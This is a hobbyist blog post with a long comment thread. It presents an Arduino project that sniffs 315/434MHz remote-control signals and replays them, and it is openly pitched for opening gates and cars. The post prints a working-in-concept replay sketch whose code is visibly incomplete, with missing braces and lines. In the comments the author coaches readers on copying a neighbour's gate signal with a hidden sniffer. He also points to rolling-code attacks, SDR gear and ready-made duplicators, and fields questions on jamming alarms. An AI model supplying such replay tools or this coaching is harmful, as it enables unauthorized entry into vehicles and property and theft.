RF Sniffer – open gates, cars, and RF remote controlled devices with ease.

The more I get to play with hardware, the more I get to see how security is lacking or implemented poorly (and I’m being very polite here). This time, I would like to share my 315mhz/434mhz RF Sniffer project, which can be used to open poorly protected gates, cars, etc. Nothing new under the sun, only my own take on building such a device.


TIP – The size of the antenna is VERY important. Don’t neglect it – use the right length and use a wave calculator for future reference.


The story

I wanted to see how easy it is to open a keyless car using an Arduino. And then I wanted to simultaneously control multiple appliances operating on different frequencies (315Mhz/434Mhz).

Using the following design, you can easily make a fuzzer to randomly open/close/control all kind of RF receivers out-there. You have been warned.

Current version of the sniffer will resend whatever it sniffs 10 times. Behavior is easily changeable.

I am using the RCSwitch library to reduce heavy thinking on my part. Mission accomplished.


Shopping List

Amount Part Type Properties
2 Inductor wire antenna
1 Red LED – 5mm package 5 mm [THT]; leg yes; color Red (633nm)
1 Arduino Uno (Rev3) type Arduino UNO (Rev3)
1 315Mhz RF-LINK_RX package rf-link_rx; part # WRL-10533
1 434Mhz RF-LINK_RX package rf-link_rx; part # WRL-10532
1 315Mhz RF-LINK_TX package rf-link_tx; part # WRL-10535
1 434Mhz RF-LINK_TX package rf-link_tx; part # WRL-10534



We connect both receivers/transmitters like the following:



And here is the Arduino code. Use at your own risk.

 * RF Sniffer (C) Elia Yehuda 2014
 * This program was coded.
 * No warranty whatsoever.
 * Using this program will cause something, most likely problems.

#include <RCSwitch.h>

// number of times to resend sniffed value. use 0 to disable.

// ye, thats the led pin #
#define LED_PIN 13

// class for 315 receiver & transmitter
RCSwitch rf315Switch = RCSwitch();
// class for 434 receiver & transmitter
RCSwitch rf434Switch = RCSwitch();

void setup()
        // print fast to console

        // 315 receiver on interrupt #0 (pin #2)
        // 315 transmitter on pin #4
        // how many resends
        // 434 receiver on interrupt #1 (pin #3)
        // 434 transmitter on pin #5
        // how many resends
        Serial.println("[+] Listening");

// simple decimal-to-binary-ascii procedure
char *tobin32(unsigned long x)
        static char b[33];
        b[32] = '\0';
        for ( int z = 0; z < 32; z++) {
                b[31 - z] = ((x >> z) & 0x1) ? '1' : '0';
        return b;

void process_rf_value(RCSwitch rfswitch, int rf)
        char str[120];
        unsigned long value;

        // flash a light to show transmission
        digitalWrite(LED_PIN, true);
        value = rfswitch.getReceivedValue();
        if (value) {
                sprintf(str, "[+] %d Received: %s / %010lu / %02d bit / Protocol = %d",
                        rf, tobin32(value), value, rfswitch.getReceivedBitlength(), rfswitch.getReceivedProtocol() );
        } else {
                sprintf(str, "[-] %d Received: Unknown encoding (0)", rf);

        // resend the sniffed value (RESEND_SNIFFED_VALUES times)
        rfswitch.send(value, rfswitch.getReceivedBitlength());
        // reset the switch to allow more data to come
        // stop light to show end of transmission
        digitalWrite(LED_PIN, false);

void loop()

        if (rf315Switch.available()) {
                process_rf_value(rf315Switch, 315);

        if (rf434Switch.available()) {
                process_rf_value(rf434Switch, 434);

111 thoughts on “RF Sniffer – open gates, cars, and RF remote controlled devices with ease.

    1. ofc.

      The hw scheme I provided is 100% same as the one I used in my testings. The sw part is a stripped-down code of my full project, but is enough to get one started.

      With a few modifications to the code, one can simply record the sniffed data instead of immediately resending it. Also, for useful results, when resending, a delay() should be considered for obvious reasons 😉

      Most vulnerable targets I found are remote-controlled gates and old cars. Also weather stations seems to produce a lot of noise.

      Using same logic, one can add 816Mhz tx/rx to cover most widely used RF out there. and rule them all 🙂

  1. Awesome project. Can u give any details as to how you can save the codes it sniffs? I’m looking to do an automation project and this fits the bill.


      1. z4ziggy

        Hi, sorry, I wanted to ask if I could explain how to start the second button code so that you can manually operate it, you could rewrite the sketch maybe with a button on any pin..
        However, I apologize for the language but I am Italian

      2. Thanks, I’m not very practical but any basic electronics concept I have, my doubt is where I have to put it in the sketch …
        Thank you in advance

      3. Sorry about stress again, I found almost all the components, but the only one I can find is wrl 10534, the only seller that has these same pin components is SF but does not have the 10534, the other sellers Sell ​​it with just 4 pins are it the same? Do I have problems linking it?

  2. simple circuit, simple code – but not flying! receiver not seeing anything? i see chatter on other sites about a 1M resistor between data line and ground and a 330 Mfd cap and production changes on RX board pushing less power thru data line. no joy! any clues???

  3. Ziggy, Really like your project. I have the library, replicated the circuit and code – and quadrupled checked everything – but the receivers are never ‘available’. I have three 315 MHz devices to ‘sniff’ but with/without antennas, placing devices near/far from the antenna and even ordering/installing new RX / TX boards – has no impact on the results. Commenting out the .available test just yields the same data stream regardless of the device I test and, in fact , powering off the circuit has no impact on the data stream. Used SparkFun supplier.
    Please, any hints for me?

    1. I totally understand your frustration since it took me a while and some trial & error to get all to work as smoothly (eg, I too have looked into connecting a resistor to the data line…).

      I think you should first make sure your hw is 100% supported with this library; maybe you need to use a different lib/code to match your receiver – play with the code until you start getting some RAW (hex) data, then adjust it to your purpose.


  4. I have to reach our house by a shared drive with an electronic gate. The owner will not give the remote to copy. Is there any way I can buy a sniffer so that I can copy the opening code?
    I know nothing about electronics

      1. Thank you for that but it looks as though I have to get hold of my neighbours remote to work it. What I need is something I can leave in my garden so that when he uses his remote it will pick up the signal. Then I should be able to duplicate it with this sort of device you suggest

    1. Hello Roger,

      What your neighbor has done is illegal. You have the right to access your property and he cannot unreasonably deny you access. If his property is considered the dominant property, he has the right to put up a gate, but he must give you unrestricted access to it. This includes a key. It is illegal for him to tell you to wait for him to open the gate for you, as you may need access when he is not home.

      1. Thank you
        To a non-electrician it looks very complex to make a sniffer and I am trying to find someone in the UK to make the device. How close does it need to be to the gate to pick up the signal – or maybe it needs to be close to the remote being used?

      2. IIRC from my testings, the sniffer worked at a 10 meter distance, and obviously can be extended with better equipment.

        And I’m no electrician by any means 🙂 Just start hacking around with Arduino, and you’ll find yourself playing with those [electronic] lego pieces in no time.

  5. I want to know does this sketch work with any modulation and encoding out of the box? For example does it simply sniff and transmit raw data? Kind of like hackrf_transfer using a raw iq/wav file to do a replay attack? Or does the library define some sort of encoding like ask ook

    Thank you

  6. Hi thanks for your tutorial !! just wondering if you could help me out ive got a arduino uno and a 433mhz receiver and transmitter im having trouble i can pick up signals from some remotes but not others ? but they are all 433mhz remotes and i see in alot of the tutorials people are using the 8 pin 433mhz receiver mines only the 4pin which from what i can tell is the cheap version by what it cost XD and i see alot more people using the other ones could this be why im only picking up certain 433mhz signals from some remotes and not others ? sorry if its a dumb question ! still new to this

    1. good question, but i have to admit i never played with 8-pin receivers. maybe it’s encoding issue, distance, antenna – i would play with any of those vectors to test for any changes. Try to obtain an SDR (HackRF or alike) to watch your signals and debug it further 😉

      1. Hello Z4ziggy

        I am going to try and find someone to make the sniffer for me but before I do can I clarify one thing.
        If I locate the device near the gate and activate it when he exits will it record the signal for me?
        If it does that is ideal if I can then transmit the signal to one of the RF duplicators that you advise I assume?

        many thanks


      2. Yep, the device should sniff the signal when located near the gate. And those duplicators already has the ‘record’ function in them, so they should work best for u.

  7. Im confused how do you start and end it? Where are the buttons? also I did this and I get an error for RCSswitch missing where do I put that is that code that is supposed to be added?

    1. there is no start/stop to the code provided – only endless sniffing & replaying routine, as a basic template example.
      regarding RCSwitch, consult your IDE docs how to install Arduino libraries (usually its extracting the zip in ~/Arduino/libraries/ folder).

  8. Hello z4ziggy, is there any chance to write in private?
    I connected all wires, but nothing is working. The LED is flashing for about 5 times the first time I connect the arduino to the PC. Then it stops. The serial monitor is showing nothing except + Listening.
    When connecting the LED to the breadboard -> the orange LED on the arduino illuminates with half of its power.
    I would appreciate your help. Thanks

    1. I doubt I can help much – you’ll have todo the debugging yourself.
      I suggest you start with connecting only 1 transmitter and getting it work 1st – it might take some playing with the code and the pins to get the correct layout, so don’t be discouraged – enjoy the path 😉

  9. Is it possible for me to build this RF sniffer if I am not in anyway experienced with the subject(programming or electronics)?

  10. is it possible for me to build the RF sniffer with no experience with electronics nor programming?

    I want to build the sniffer but I also have a question or two.

  11. Here is just one question. Can this device open any RF receiver with out having any contact with, lets say the remote for the garage? Can I just walk up to any random garage and with this project just open it? Please correct me if my point of view on this project is totally of the subject and if you don’t mind is their not a link or any information on what exactly does this RF sniffer do. I posted a link on yahoo asking the same question and no one is getting back to me. But if it is too much inconvenience, I understand.

    1. The project I’m describing here is a sniffer – eg, it will sniff an existing signal, and will let you replay it at your will. it will not fuzz or try different combos to open unknown garage doors. You can find in the comments above links to other ready-made products (sold on ebay/aliexpress) which wont require much technical know-how like this one.

  12. SORRY Z4ZIGGY for the hassle. So this project wont work on those high tech remotes that frequency level cycle or I am not sure?

  13. I am truly sorry for all the questions but I would like to ask you is their such a device that can work on remotes that have the cycling frequencies on them? Another thing I would like to know, is their such a device like you mentioned before that can fuzz or try different combos to open unknown garage doors?

    I really try to find this information on google but its that easy for me and like I said before if its too much inconvenience, I understand.

    Thanks z4ziggy

  14. hi z4ziggy I hope you don’t mind me bothering you with all the questions but I have done some more research on RF sniffers and I have found Sammy kamkars invention to be quite interesting, I am sure you have heard of him. He’s device (rolljam) can bypass rolling codes witch is the device I asked you about previously. I just wanted to know if the HackRF one device can do everything your RF sniffer can do?

    1. Sammy’s device is a more advanced device. As I said earlier – this project is a starting point.

      regarding HackRF – it should be doable. Maybe consider BladeRF or others which are full-duplex.

  15. hi z4ziggy, please can you answer this question for me I tried asking others but I don’t succeed. I am sure you heard of Andrew Nohawk and I want to learn how to hack rolling codes and he shows you how on his website. I want to learn while having everything I need in my possession, I would find it much easier that way going through it step by step. As I read through it I find it quite difficult finding out everything I need. Could you be kind enough and tell me everything I need to go about doing this. ps I don’t know wether I should get a yardstick one or rfcat or even both so if you could help me with this I would be so grateful.

    hope to hear from you soon!


    1. He actually uses TWO YardStickOne since it’s half-duplex device (eg, can only send OR receive at the same time). You can use BladeRF or other full-duplex SDR device which supports this frequency range. good luck.

  16. So if I get a full-duplex SDR device, I can receive and transmit at the same time then there is no need for two devices.
    what does he use to jam the signal since I am trying to hack rolling codes?

    I really appreciate you help, I try asking these questions on yahoo but people just think I am some thief trying his luck.

  17. Hello z4ziggy, I am doing research at my school and am interested in possibly using your design to demonstrate this device to our local police department and write a report on the increasing problem of these type of devices. Is everything you listed as well as the code and diagram enough to get one to work? What is the difference between the code you have here and your full one? I also wanted to get your approval on the use of your design for this purpose.

    1. Feel free to use this as you like. My private code was a bit more malicious – it saved the sniffed data and allowed me to resend it whenever I wanted (by pressing a button), but this should be enough for a demo and you can always enhance it yourself. good luck.

  18. hi z4ziggy I am going to buy two yardstick ones, I am going to learn how to hack rolling codes using Andrew nohawks method and I just wanted to make sure is that all I need for example, no rtl sdr and any other devices. I just want to know everything I need so I can buy it all at once and I managed to save some cash in order to buy these things and I am still in school so its difficult for me to make money but I managed and I just don’t want to buy the wrong stuff.

    If you could help me I would really appreciate it

    hope to hear from you soon

  19. there is another thing I wanted to know, before you mentioned that I can use a duplex sdr device witch supports this frequency range. Should I be concerned about the frequency range if I were to buy the two yardsticks ones. I don’t know if this matters but I am situated in south Africa

  20. In theory, with this clone code the code that transmits a car command. But if you are trying to play maliciously, how can you modify so that the owner’s command does not open the car and has to press again and you with the previous code you can use? Thanks.

    1. It will clone any code. however, cars usually use different code for lock & unlock, unlike gates which uses same code for lock/unlock. the above sniffer sniffs whatever code that is transmitted and is able to resend it later again.

  21. I am just curious to know and wanted to ask you. It is a bit off topic but I figured if there is anyone who would know its you. Some places like libraries, schools and cinemas have jammers for obvious reasons. What if a criminal decides to break into one of these places, wont the jammer prevent the alarm signal from sending? (cellular based alarm system in this case)

    hope to hear from you soon


  22. Hello Ziggy,
    Is it possible to use this module with Your code?

    If Yes,can You please tell me which part I need to change so arduino can operate with it?
    I am planing to make only listener for device which is using 868mhz for sending information.
    Also i need only to see information not to duplicate it. Thank You in advance!

  23. hi,

    i got the circuit running perfectly, with the exception that 433mHz transmission always ended up in the 313mHz receiver buffer. i.e., rf315Switch.available() “hijacks” 433mHz data, and rf434Switch.available() rarely gets a hit.

    in my project it doesn’t really matter as i am only interested in receiving any RF data, and don’t care if it is 313 o 433. but it is frustrating not understanding why this is the case. any thoughts?


  24. so will this device replay the keyless signal for a car key amplifie it to the car to trick it that the car keys is closer then it its

  25. Hi z4zigg, before i asked if it is possible for thieves to jam alarm systems and you said ofc but can a DSSS based alarm be jammed as well?
    Thanks for your time.

  26. hi z4ziggy

    i bought all pieces and made mt own but im not shure about how to use it because in the monitor, it only show [+] Listening and i tried a lot of things but with no succes can you please help me

      1. Ok I’m gonna try this.

        If it recive anything I will see it in the serial monitor right?

  27. Hi, I was testing read the 2 frequencies like you did (before find your site) and it only works with 1 pin connected at a time, then I tried your breadboard setup and your code and my problem remains, i think there is something to do with the interrupts on pins 2 and 3, do yours works flawlessly on both frequencies at same time?

  28. It works pretty well with one receiver, but as I enable the second INT everything is gone.
    I mean
    enabling this two command at the same time won’t work
    plz help me

    1. Congrats on getting so far, but man, it’s been more than a few days (…) since I’ve touched this project so I hardly remember anything about this. I can only suggest google for multiple receivers with this library.

  29. Hi can the arduino rf transmitter receiver sets be used for this? They have 3 pin and 4 pin configuration for 315 and 433mhz. The ones listed have 4 pin and 8 pin configuration. Thanks

  30. Z4ZIGGY Hello, I would like to build such project, however as this is a bit old I said I will ask if you would use different tx / rx hardware. I will be working on arduino uno/ nano of course.

    1. Great question indeed. I’m planning on releasing a new approach which also targets rolling-codes – I just need to find the time. I promise to publish however it goes 😉

      1. Ohh that’s great, also thanks for fast reply!
        The goal I am trying to get this project done is because I would like to be able to open an barrier, for which landlord wouldn’t give me the key…
        it’s said so: barrier open from 8am to 15 pm, but I come home at 20h or something due to work.
        So what would I really need for it?
        Also can’t wait for the post you mentioned above 🙂

      2. Since you just want to duplicate the signal, you could use my approach for DIY style, or order one of those RF duplicators from AliExpress for a faster & simpler solution.

  31. Well I like to play with arduino when I have time, so I definitely won’t buy it. I want to make it myself you know. However, why you using 2 rx and 2 tx?

    what I really need is make an receiver, wait for him to click on his remote and copy signal. Then I can make RF duplicator right?

  32. so could we say, that in future (when you have time) you will make an new approach, you will use only 1 tx one rx of 816 Mhz?
    Asking cause I saw tx/rx’s are expensive :/

    1. you dont need to wait – if you are only interested in 816mhz, buy the 816mhz tx/rx pair and be done with it. this project simply aims to support more frequencies (eg, devices), but you can also use less… gluck.

      1. amm I think I did not understand you good, so apologises.
        which one is better to have now? 816mhz or 434mhz? I thought if I buy 816mhz I cover also everything in 434mhz?
        as you may see, I am not into radio frequencies at all.

      2. in this project each tx/rx I use is for a specific frequency – either 315 or 434 or 816 or other, and it will receive/transmit only on this frequency. I highly suggest you learn to swim before you jump into the water 😉

  33. well then it’s better to wait with my SDR-TV dongle for him to use his remote as I don’t know which frequency he uses right?

    1. if you can get hold of the remote, you will be able to determine which frequency it’s using just by opening it. SDR will be great help for you to find the frequency and even record and replay the signal. google is your best friend. gluck.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s